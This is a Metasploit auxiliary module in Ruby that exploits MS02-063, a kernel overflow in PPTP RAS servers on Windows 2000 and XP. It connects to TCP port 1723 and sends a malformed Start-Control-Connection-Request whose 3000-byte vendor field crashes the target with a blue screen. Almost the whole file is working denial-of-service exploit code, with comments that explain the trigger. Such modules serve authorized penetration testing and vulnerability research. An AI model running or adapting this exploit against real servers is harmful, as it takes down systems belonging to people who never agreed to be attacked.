##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers the module metadata (name, description, references, notes) and
  # the only option this module needs: the PPTP control port, TCP/1723.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS02-063 PPTP Malformed Control Data Kernel Denial of Service',
        'Description' => %q{
          This module exploits a kernel based overflow when sending abnormal PPTP Control Data
          packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers
          (Remote Access Services). Kernel memory is overwritten resulting in a BSOD.
          Code execution may be possible however this module is only a DoS.
        },
        'Author' => ['aushack'],
        'License' => MSF_LICENSE,
        'References' => [
          ['BID', '5807'],
          ['CVE', '2002-1214'],
          ['OSVDB', '13422'],
          ['MSB', 'MS02-063']
        ],
        'DisclosureDate' => '2002-09-26',
        'Notes' => {
          # A successful run takes the whole target OS down; there is no
          # partial or recoverable outcome, hence CRASH_OS_DOWN.
          'Stability' => [CRASH_OS_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options([Opt::RPORT(1723)])
  end

  # Opens one TCP session to RHOST:RPORT, writes a single malformed PPTP
  # Start-Control-Connection-Request and closes the socket. Nothing is read
  # back: the module does not wait for a reply, it only reports that the
  # packet was sent.
  def run
    connect

    print_status('Sending PPTP DoS Packet...')
    sock.put(malformed_start_control_request)
    print_status('Packet sent. Kernel should halt on a Stop Error (BSOD).')

    disconnect
  end

  private

  # Assembles the control message byte-for-byte. The header fields follow the
  # Start-Control-Connection-Request layout (values copied from a Wireshark
  # capture). The declared length field (0x009c) does not match the bytes
  # actually written, and the vendor field is oversized (3000 bytes) — that
  # oversized field is what the original author marks as the trigger.
  #
  # @return [String] raw control message bytes, as the original in-place
  #   `<<` chain produced them
  def malformed_start_control_request
    fields = [
      "\x00\x9c",         # length
      "\x00\x01",         # control message
      "\x1a\x2b\x3c\x4d", # cookie
      "\x00\x01",         # start control connection req
      "\x00\x00",         # reserved
      "\x01\x00",         # protocol version
      "\x00\x00",         # reserved
      "\x00\x03",         # framing capabilities
      "\x00\x00\x00\x02", # bearer capabilities
      "\xff\xff",         # max channels
      "\x0a\x28",         # firmware revision
      "\x00\x01",         # Hostname
      'A' * 3000          # Vendor - trigger vuln
    ]
    fields.join
  end
end